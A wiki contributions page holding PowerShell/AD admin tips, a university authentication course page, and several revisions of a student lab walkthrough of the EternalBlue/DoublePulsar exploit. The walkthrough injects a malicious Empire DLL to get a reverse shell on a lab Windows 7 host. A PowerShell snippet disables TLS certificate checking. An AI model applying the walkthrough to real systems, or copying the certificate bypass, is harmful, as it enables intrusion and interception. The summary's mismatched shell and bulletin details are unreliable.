ICO wiki - User contributions [en]

AD Powershell

2017-12-17T19:54:51Z

Lphanvan: Created page with "Welcome to the Learn-Power-Shell wiki! # Learn-Power-Shell Power shell tips collected by Ender Phan # Some useful links: - https://blog.windowsnt.lv/2011/11/15/tracking-user-..."

Welcome to the Learn-Power-Shell wiki!

# Learn-Power-Shell
Power shell tips collected by Ender Phan
# Some useful links:
- https://blog.windowsnt.lv/2011/11/15/tracking-user-activity-english/

- https://technet.microsoft.com/en-us/library/cc281945(v=sql.105).aspx

- https://technet.microsoft.com/et-ee/scriptcenter/dd742419.aspx

- It's a part of the AD module which is a part of RSAT (Remote Server Administration Tools). microsoft.com/en-us/download/details.aspx?id=7887

- http://powershelltutorial.net/

- https://ss64.com/ps/ ( live with it )

- https://technet.microsoft.com/en-us/scriptcenter/ ( just a blog about Powershell Scripting )
# Some useful books for rookies and masters:

Beginners:

- learn-windows-powershell-3-in-a-month-of-lunches-don-jones-jeffrey-hicks

- PG_PowerShell_XWIPSCRE01_0

# Some useful tips:

- To check AMD:

`$env:Processor_Architecture`

- Get Service by its variable

`Get-Service | Where-Object {$_.Name -eq "VSS"}`

+ Name: is the name of colum
+ VSS: is the name of service

- Display by specific column

`Get-Service | Where-Object {$_.Name -eq "VSS"} | select Status`

- Outfile

`Get-Service | Where-Object {$_.Status -eq "running"} | Format-list | Out-File .\outhere.txt`

- Responding property variable

`Get-Process | where {$_.Responding -eq "true"}`

- Operator

`Get-Service | Where-Object {($_.Status -eq "running") -and ($_.Name -eq "WSearch")}`

- Whatif command

`Get-Process notepad |Stop-process -whatif`

- Get-EventLog

`Get-EventLog -LogName Application -Newest 10`

- Get-help

`get-help get-process`

- Tracking variable

`($PSVersionTable).psversion`

![Alt text](/image/version.PNG?raw=true "Version")

- List Variables

`dir variable:`

- Get-Alias

`Get-Alias`

- Really detail stuffs

`Get-Process notepad| Format-List * | more`

- Format Table and its property

`Get-Process | Format-Table -Property Name, Starttime`

+ Name and starttime are column name ( property )

- if interested in the column ( property ) which contains starttime

`Get-Process | Where-Object{$_.Starttime}| Format-Table -Property Name, Starttime`

`* means if Startiime -eq true
{
write-host Name, Starttime
}`

# Alias

- Diffences between process and function to get its alias

`Get-Alias history`

`Get-Alias -Definition Where-Object`

- Get specific alias

`Get-alias [?]`

*[?] exactly ? will be listed
# Services

- To see the services are able to pause or continue

`Get-Service| ? {$_.CanPauseAndContinue}`

- Get commands about SERVICE

`Get-Command -Noun service`

![Alt text](/image/get-command-none-service.PNG?raw=true "None service")

- To set the service status

`Set-Service -Name LanmanServer -Status Paused ( requires administrator mode )`

- Get properties of Service

`Get-Service | Get-Member`

TypeName: System.ServiceProcess.ServiceController

![Alt text](/image/get-command-none-service.PNG?raw=true "get-member")

# Processes

- To start/stop processes

`Start-Process -FilePath notepad -WindowStyle Maximized`

- Kill processes

`Get-Process notepad | kill -WhatIf`

# Invoke

- List history using "h"

- Using invoke to remote command thru history ID

`Invoke-History 2`

![Alt text](/image/help.PNG?raw=true "history")

# Event logs

- See the available logs

`Get-eventlog -list`

- Newest log of Application log

`Get-EventLog -LogName Application -Newest 5`

- Get the applications logs which its message contains a word "WmiApRpl"

`Get-EventLog -LogName Application | ? {$_.Message -match "WmiApRpl"}`

- Differences between -match and property's values

`1, Get-EventLog -LogName Application -Message "WmiApRpl"` : it doesn't allow

`2, Get-EventLog -LogName Application -InstanceId "1001"` : it does allow

Case 2 is allowed because the value "1001" is matched entirely in the property InstanceId

- Select category with Select

`Get-EventLog -LogName Application -Newest 5| select Source`

==> it means whith we should use -match to find the containing word in the property.
in case if we want to short the command that makes sure the word are contained entirelly in property

# BIOS

- Some:

`Get-WmiObject -class win32_bios`

`Alias: gwmi win32_bios`

# Some methods

- Maximum value:

`($array | Measure-Object -Maximum ).Maximum`

!!!!NB:

Just use Select to select the property. If we want to get exactly the value of that property. Just use dot (.) to print its value

- Convert out-put to String

`$getEvent = Get-EventLog -LogName Application -Newest 19|?{($_.Source -match "SSH") -and ($_.Message -match "user")} |fl -Property Message |out-string `

* Use Out-string to convert

- Split, In order to split the output we have to convert it to string variable.

`$getEvent.Split(":")`

# Active Directory

`[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()`

- [System.DirectoryServices.ActiveDirectory.Domain] --> class identifier
- GetCurrentDomain() --> method

Link :
https://blogs.technet.microsoft.com/heyscriptingguy/2006/11/09/how-can-i-use-windows-powershell-to-get-a-list-of-all-my-computers/

https://technet.microsoft.com/en-us/library/ff730967.aspx

LDAP Scan Map:

https://technet.microsoft.com/en-us/library/ff730967.aspx

Bloodhound
https://blog.cobaltstrike.com/2016/12/14/my-first-go-with-bloodhound/

Mapping ADA
https://msdn.microsoft.com/en-us/library/aa746392(v=vs.85).aspx

CSV:
http://www.jhouseconsulting.com/2014/01/06/script-to-create-a-report-on-useraccountcontrol-flags-1088

UserAccountControl:
http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm

http://www.netvision.com/ad_useraccountcontrol.php

Param:
https://www.experts-exchange.com/questions/28587998/Powershell-require-at-least-one-of-two-parameters-to-be-mandatory.html

Format:
https://github.com/zloeber/FormatPowershellCode

# How to upgrade powershell 4.0

1. Download and Install the full package 4.5.1 here

https://www.microsoft.com/en-us/download/details.aspx?id=40779

2. Checking for update if needed

3. Download and Install the update package here:

Go to : https://www.microsoft.com/en-us/download/details.aspx?id=40855

Click "Download" then stick on: `Windows6.1-KB2819745-x64-MultiPkg.msu` and Next

!!! Mention on what OS (x32 or x64) you are using

4. Restart the machine if it requires

# How to install AD cmdlets

Command lines:

`Import-Module ServerManager`

`Add-WindowsFeature RSAT-AD-PowerShell`

`Install-windowsfeature -name AD-Domain-Services –IncludeManagementTools`

`Import-module ActiveDirectory`

# To see who is logged on:

`query user /server:SERVERNAME`

# Anatomy LDAP Attributes
Useful Links: http://www.selfadsi.org/

- LastLogonTimeStamp and Lastlogon

**`LastLogonTimeStamp` : replicated**

**`Lastlogon`: Non-replicated**

It is important to note that the intended purpose of the lastLogontimeStamp attribute to help identify inactive computer and user accounts. The lastLogon attribute is not designed to provide real time logon information. With default settings in place the lastLogontimeStamp will be 9-14 days behind the current date

- Modifytimestamp

This attribute appears in entries that have been modified using the protocol (e.g., using the Modify operation). The value is the time the entry was last modified.
More: https://tools.ietf.org/html/rfc4512

This attribute is not replicated. If we want want to query the latest values, we should scan on every each DC's and get the maximum number which means the latest date time values.

ModifyTimestamp is marked as Constructed Attribute (effectively an alias for whenChanged)

- PASSWD_CANT_CHANGE Flag in userAccountControl (Caution: This bit does not work as expected!)

flag ADS_UF_PASSWD_CANT_CHANGE (0x40) in userAccountControl attribute meanwhile it can’t be queried correctly if improper configuration is set for this flag which means the "user cannot change password" is determined by the access control entry on the user account rather than the ADS_UF_PASSWD_CANT_CHANGE (0x40) bit in the userAccountControl attribute.

More: http://ldapwiki.com/wiki/User-Account-Control%20Attribute

http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm#UF_PASSWD_CANT_CHANGE

- LockoutTime

http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm

If you are currently connected with a user object via LDAP, you can also examine the attribute msDS-User-Account-Control-Computed. In contrast to the userAccountControl, this shows you in the UF_LOCKOUT whether an account is actually deleted. However, it is a constructed attribute so that it cannot be used as a filter criterion in LDAP search operations.

- Get-WMIObject ( ERROR: Get-WmiObject : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)) )

Setting DCOM Security to Allow a User to Access a Computer Remotely
Security in WMI is related to connecting to a WMI namespace. WMI uses DCOM to handle remote calls. One reason for failure to connect to a remote computer is due to a DCOM failure (error "DCOM Access Denied" decimal -2147024891 or hex 0x80070005). For more information about DCOM security in WMI for C++ applications, see Setting Client Application Process Security.

You can configure DCOM settings for WMI using the DCOM Config utility (DCOMCnfg.exe) found in Administrative Tools in Control Panel. This utility exposes the settings that enable certain users to connect to the computer remotely through DCOM. Members of the Administrators group are allowed to remotely connect to the computer by default. With this utility you can set the security to start, access, and configure the WMI service.
The following procedure describes how to grant DCOM remote startup and activation permissions for certain users and groups. If Computer A is connecting remotely to Computer B, you can set these permissions on Computer B to allow a user or group that is not part of the Administrators group on Computer B to execute DCOM startup and activation calls on Computer B.

To grant DCOM remote launch and activation permissions for a user or group

1. Click `Start` , click `Run` , type `DCOMCNFG` , and then click OK.

2. In the Component Services dialog box, expand Component Services, expand Computers, and then right-click My Computer and click Properties.

3. In the My Computer Properties dialog box, click the COM Security tab.

4. Under Launch and Activation Permissions, click Edit Limits.

5. In the Launch Permission dialog box, follow these steps if your name or your group does not appear in the Groups or user names list: In the Launch Permission dialog box, click Add.

6. In the Select Users, Computers, or Groups dialog box, add your name and the group in the Enter the object names to select box, and then click OK.

7. In the Launch Permission dialog box, select your user and group in the Group or user names box. In the Allow column under Permissions for User, select Remote Launch and select Remote Activation, and then click OK.

The following procedure describes how to grant DCOM remote access permissions for certain users and groups. If Computer A is connecting remotely to Computer B, you can set these permissions on Computer B to allow a user or group that is not part of the Administrators group on Computer B to connect to Computer B.

More here https://msdn.microsoft.com/en-us/library/aa393266.aspx

# How to expand the WMI Root Nodes from Domain

Providing DCOM permission on multiple machines can be done by applying group policy
> security settings for DCOM
computer configuration > windows settings > security settings > Local policies >
Security options > DCOM : Machine launch restrictions
Please check the following link, that is what we need to do:

Securing a Remote WMI Connection
http://msdn.microsoft.com/en-us/library/aa393266%28VS.85%29.aspx

Connecting Through Windows Firewall
http://msdn.microsoft.com/en-us/library/aa389286%28VS.85%29.aspx

# Acceleration

* Creating the object with [psCustomObject] helps to speed up the code in powershell, less typing as well :))

More here: http://www.jonathanmedd.net/2011/09/powershell-v3-creating-objects-with-pscustomobject-its-fast.html

For example:

```html

$TestAddMember = {
(0..5000) | ForEach-Object {$CustomObject = New-Object psobject
$CustomObject | Add-Member -Name "Name" -Value "Test Name"
$CustomObject | Add-Member -Name "ID" -Value $_
$CustomObject
}
}
Measure-Command $TestAddMember | Format-Table TotalSeconds -Autosize

```
This takes 28 second to complete

```html
$TestProperty = {
(0..5000) | ForEach-Object {[pscustomobject]@{Name = "Test Name"; ID = $_}}
}
Measure-Command $TestPSCustomObject | Format-Table TotalSeconds -Autosize

```

This takes 0,9 second to complete with less typing

* Where cmdlets
1.
**$file.Where({$_.ProcessName -match "winlogon"})**
```html
measure-command {$file.Where({$_.ProcessName -match "winlogon"})} |select -ExpandProperty totalmilliseconds

===> 3.8481 sec
```
2.
**$file |? ({$_.ProcessName -match "winlogon"})**
```html
measure-command {$file |? ({$_.ProcessName -match "winlogon"})} |select -ExpandProperty totalmilliseconds

===> 9.6128 sec
```
_Reason: Because the [1] does not use the pipe line "|", it's a great functionality but it's really slow_

# Tips and Tricks

* Last command:
`$$ `
* Find Command:
`Get-Command *csv* `
* Get-adgroup:
`Get-ADGroupMember 'Domain Admins' | Get-ADUser -Properties sAMAccountName|select sAMAccountName`

* tofileTime()
`(get-date "Wednesday, July 12, 2017 7:10:52 PM").tofiletime()`

* String Encryption

`$Secure = Read-Host -AsSecureString`

`$Encrypted = ConvertFrom-SecureString -SecureString $Secure`
* Groups commands

`whoami /groups`

# ERROR HANDELING

**ERROR: The underlying connection was closed: An unexpected error occurred on a receive**

```
if (-not ([System.Management.Automation.PSTypeName]'TrustAllCertsPolicy').Type)
{
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
$AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
[System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
}
```

NSA - MS17-010

2017-12-17T19:43:57Z

Lphanvan: /* Executing the FuzzBunch */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==

Author: Ender Loc Phan

Video Proof: https://www.youtube.com/watch?v=6VWQcMP6v4w

Nb!!: For education purpose only

=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server.
To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.
The security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Execute FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

NSA - MS17-010

2017-12-17T19:43:10Z

Lphanvan:

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==

Author: Ender Loc Phan

Video Proof: https://www.youtube.com/watch?v=6VWQcMP6v4w

Nb!!: For education purpose only

=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server.
To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.
The security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Category:I805 Authentication and Authorization

2017-05-03T10:06:01Z

Lphanvan: /* RED TEAM */

=Authentication and Authorization=

Yubikey as PKI token howto: https://lauri.vosandi.com/2017/03/yubikey-for-ssh-auth.html

Yubikey as GPG token howto: https://lauri.vosandi.com/2017/03/yubikey-for-gpg.html

==General information==

In this course we continue where we left off with [https://wiki.itcollege.ee/index.php/Category:I802_Firewalls_and_VPN_IPSec#Firewalls_and_VPN.2FIPSec Firewalls and VPN/IPsec] course.

Relevant topics for research and implementation in the lab.
Lectures coming up for most of the topics:

* File based password stores eg. /etc/shadow, .htaccess
* Signing and encrypting e-mail using GPG
* Active Directory protocols: LM, NTLM, Kerberos, GSSAPI, SPNEGO, LDAP
* More TLS and client side authentication in particular
* Filesystem permissions: access control lists, selinux, apparmor
* RADIUS
* Multi-factor authentication: smartcards, Yubikey, Mobile-ID, etc
* Contactless cards
* On the web: Cookies, OAuth, OpenID, iPizza,

Intro slides & video recording:

https://docs.google.com/presentation/d/1NzY8AspqZwrYxoJ3Qi-pBWsMDdiIUeA4lgZnwZGTMVg/edit?usp=sharing

https://echo360.e-ope.ee/ess/echo/presentation/54eb478c-f6ae-4629-b1e3-c43f5a2f6842?ec=true

=Equipment=

* 3pcs Sun server in the college server room
* TP-Link WDR3600 wireless router routed to 172.16.*.*
* HP Probook dual-boot laptop
* iMac in 412, use admin/admin to log in with local account
* Robotics Club (wireless) network, routed to to 172.16.*.*
* 10pcs Yubikey Neo-s, currently posessed by Marvin, Madis Mägi, Artur O, Keijo

If you forget (local) Windows password use System Rescue CD to reset the password:
http://www.howtogeek.com/howto/windows-vista/change-your-forgotten-windows-password-with-the-linux-system-rescue-cd/

=Requirements=

Every service should use accounts from Active Directory.
To achieve that try to use LDAP protocol first.
Via LDAP you can retreieve the data about accounts.
If the service machine is not joined to domain create
a service account in AD to access LDAP interface first.
It really depends on the software how you need to configure it.

For fileserver/SSH/FTP/mail server first join to domain using winbind: https://help.ubuntu.com/community/ActiveDirectoryWinbindHowto#Join_AD_domain
For NextCloud, rocket.chat, OwnCloud and most web services configure
LDAP plugin to retrieve accounts from AD and LDAP bind authentication.

=Responsibilities=

Everybody should have a task, prepare a howto on the college wiki and have a topic for presentation:

* Mohanad - AD up and running, routing, howto for setting up Active Directory on Windows Server; nagios accounts from AD, possibly with Kerberos SSO
* Etienne - NextCloud server set up, howto for configuring client/app
* Taavi - Wiki accounts from AD, possibly using Kerberos SSO
* Madis Lugus - Gogs accounts from AD, possibly using Kerberos SSO and also SSH public keys from AD
* Joosep - enos.itcollege.ee clone, web server and MySQL with accoutns from AD
* Meelis - rocket.chat with accounts from AD via LDAP, possibly with Kerberos SSO, howto for configuring apps
* Sheela - mailserver with accounts from AD via LDAP, with GSSAPI authentication, howto for configuring Thunderbird/Evolution
* Artur - mailserver with AD accounts via LDAP + e-mail encryption with GPG, howto for average users
* Ardi - OpenVPN with ID-card auth, isikukood from AD attribute, howto for configuring client
* Marvin - secondary AD, routing, Samba backup DC?<insert topic of your interest>
* Arti - Samba as third DC, setting up fileserver on ZFS with SSD-s as journal/cache
* Kustas - pentest
* Ender - pentest
* Mikus - pentest
* Keijo - how are you going to pass the course?
* Anton - how are you going to pass the course?
* Tarvo - JIRA with accounts from AD via LDAP
* Ats - how are you going to pass the course?
* Nazmul - how are you going to pass the course?

=Presentations=

Presentation of up to 45min should cover what you did in order to get the service running in the desired state, what problems you had, how others can use your service and what can be done to improve the setup.

This should be more or less in logical order:

* 28. feb - Mohanad, Etienne
* 7. mar - Taavi, Madis, Artur
* 14. mar - backup slot
* 21. mar - Joosep, Meelis
* 5. apr - Sheela, Ardi
* 12. apr - backup slot
* 19. apr - Marvin, Arti
* 26. apr - Kustas & Ender

=Milestones=

This is just to keep activities in sync

==Milestone 1==

Domain controller is working.
In the internal network and over VPN connection blah.office.lan DNS requests work as expected.

On a Linux box command line users can authenticate with kerberos client utils:

kinit username@OFFICE.LAN

On a Linux box command line users can fetch stuff via LDAP:

ldapsearch -b dc=office,dc=lan -H ldap://dc-hq.office.lan -D lauri@office.lan -W

Also authenitcation with Kerberos should work:

ldapsearch -b dc=office,dc=lan -H ldap://dc-hq.office.lan -Y GSSAPI

To make life easier configure /etc/ldap/ldap.conf, if properly configured short commands work:

ldapsearch

==Milestone 2==

Deadline 21. Feb

Some services are using accounts from AD

==Milestone 3==

Deadline 28. Feb

Service owner has client application configured and knows how to configure them

==Milestone 4==

Deadline 7. Mar

Preliminary manual page created on college wiki for configuring the client application(s).
Other students are using your service.

==Milestone 5==

Keep services up and running, respond to incidents until 5th of June.
Server teardown on 5th of May. Wipe harddisks.

Everybody who has completed howto, presented their topic, co-operated with other students and not left all the responsibilities to the last minute will get a passing grade. Slackers have an opportunity to do a (hard) quiz about the topics presented to get a passing grade.

=Passing the course=

==Option A: Get busy early==

Get following done by the end of April:

* Present what you did in the lecture 45min max
* Make the necessary modifications, eg admin groups for nextcloud, wiki, gogs, jira; remove service accounts from domain users/admins group
* Submit your presentation by uploading it to Presentations folder shared at https://nextcloud.biz.wut.ee/
* Publish howto for setting up your service on internal wiki at https://wiki.biz.wut.ee/index.php/Main_Page
* Help others to make use of your service
* Publish howto for end users on internal wiki: https://wiki.biz.wut.ee/index.php/Main_Page
* Help fellow students to make use of your service
* Make use of others' services (!!!), report issues to service administrator
* Send Lauri an encrypted e-mail, howto coming up soon

Keep services up and running, respond to incidents until 12th of May.
Server teardown and '''hard deadline''' 12th of May:
Who hasn't done bullet points, including sending encrypted e-mail shall not pass!

==Option B: Quiz==

If you haven't done anything but you still want to pass please inform me early enough
so I can prepare exam questions here and we can have exam in June:

* What are the benefits of using hardware authentication token such as Yubikey
* What is two factor authentication
* In LDAP jargon what is common name, distinguished name, base DN?
* What are benefits provided by Kerberos protocol
* What software suites implement Kerberos?
* TLS protocol combines which crypto primitives? What are some properties of a TLS tunnel?
* More questions coming up later

== RED TEAM ==
Ender Phan: https://docs.google.com/presentation/d/1rH05bvqkaWYXeNwkC8XC5_UGRg2iUFltAodPaWRCIJc/edit?usp=sharing

Category:I805 Authentication and Authorization

2017-05-03T10:05:06Z

Lphanvan: /* Passing the course */

NSA - MS17-010

2017-05-02T20:55:55Z

Lphanvan: /* Microsoft Security Bulletin MS17-010 - NSA Tool leak */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==

Author: Ender Loc Phan

Video Proof: https://www.youtube.com/watch?v=6VWQcMP6v4w

=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server.
To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.
The security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

